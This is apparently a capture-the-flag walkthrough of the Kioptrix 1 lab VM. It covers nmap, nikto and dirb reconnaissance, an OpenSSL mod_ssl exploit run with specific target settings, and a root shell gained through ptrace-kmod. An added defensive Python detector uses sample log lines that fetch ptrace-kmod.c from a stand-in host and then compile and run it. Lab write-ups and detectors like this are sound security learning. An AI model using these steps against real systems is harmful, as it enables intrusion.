Kioptrix 1 Walkthrough

Kioptrix 1 VulnHub VM Walkthrough

I started the box with a netdiscover scan, found the IP was

netdiscover -r

Then ran an nmap scan and discovered some open ports

nmap -sV -Pn -vv -T4 -A -p- --script=auth,brute,discovery,exploit,vuln -oN

SSH version

Apache version, some OS info and mod_ssl/openssl version

An open rpc port

NetBIOS and https

I continued my enumeration by running dirb against the webserver


I found a site, the Multi-Router Traffic Grapher. I looked up associated vulnerabilities, but didn’t find much 🙁

A Nikto scan picked up a few Apache and OpenSSL vulnerabilities

nikto -h

I searched for possible exploits on Google and found a couple

I tried the second entry, openssl-scanner. The host came back as vulnerable!

This is a great tool if you have to scan an entire network quickly for this openssl exploit
I could use openssl-too-open and escalate privileges manually, but OpenFuck should do this for us 🙂

We execute openfuck with no options to find our OS/apache version

We have to use 0x6b for the exploit to work, and chose 40 connections because the exploit doesn’t always take right away. After we connected to a shell, openfuck downloads, compiles and executes ptrace-kmod to attempt privilege escalation to root. In our case it worked!
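
From the defender's side, the download, compile and execute sequence described above leaves a recognizable process chain under the web server's account. The detection logic below is an added example, not part of the original walkthrough or of any tool it mentions; the event format, the `apache` account name, the paths and the sample lines are all constructed assumptions.

```python
from collections import defaultdict

# Constructed process-execution events (not from the original page) in a
# hypothetical "time user ppid pid exe args..." format. The "apache" account
# name, paths and URLs are assumptions for illustration.
SAMPLE_EVENTS = """\
10:01:02 apache 812 4101 /bin/sh sh -i
10:01:03 apache 4101 4102 /usr/bin/wget wget http://files.example/ptrace-kmod.c
10:01:05 apache 4101 4103 /usr/bin/gcc gcc -o /tmp/p ptrace-kmod.c
10:01:06 apache 4101 4104 /tmp/p /tmp/p
10:02:00 root 1 900 /usr/bin/gcc gcc -o build/app app.c
10:03:10 apache 812 4200 /usr/bin/wget wget http://mirror.example/robots.txt
"""

SERVICE_USERS = {"apache", "httpd", "www-data", "nobody"}
DOWNLOADERS = {"wget", "curl", "ftp", "lynx"}
COMPILERS = {"gcc", "cc", "make"}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
ORDER = ("download", "compile", "execute")


def stage_of(exe):
    """Map an executable path to a stage of the download/compile/run chain."""
    name = exe.rsplit("/", 1)[-1]
    if name in DOWNLOADERS:
        return "download"
    if name in COMPILERS:
        return "compile"
    if exe.startswith(WRITABLE_DIRS):
        return "execute"
    return None


def find_chains(log_text):
    """Alert once per service-account shell that completes all stages in order."""
    progress = defaultdict(list)  # (user, parent pid) -> events matched so far
    alerts = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[1] not in SERVICE_USERS:
            continue
        time, user, ppid, _pid, exe = fields[:5]
        seen = progress[(user, int(ppid))]
        if stage_of(exe) == ORDER[len(seen)]:
            seen.append((time, exe))
            if len(seen) == len(ORDER):
                alerts.append({"user": user, "ppid": int(ppid), "events": list(seen)})
                seen.clear()
    return alerts
```

Calling `find_chains(SAMPLE_EVENTS)` returns a single alert for the shell with parent PID 4101; the root build and the lone wget by apache do not complete the chain and stay quiet.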

After getting root, I looked around the box for anything interesting… I noticed some files in /var/mail/ for a couple users on the box

After cding to the dir, I found a file named “root” which congratulated me for rooting the Vulnerable VM!
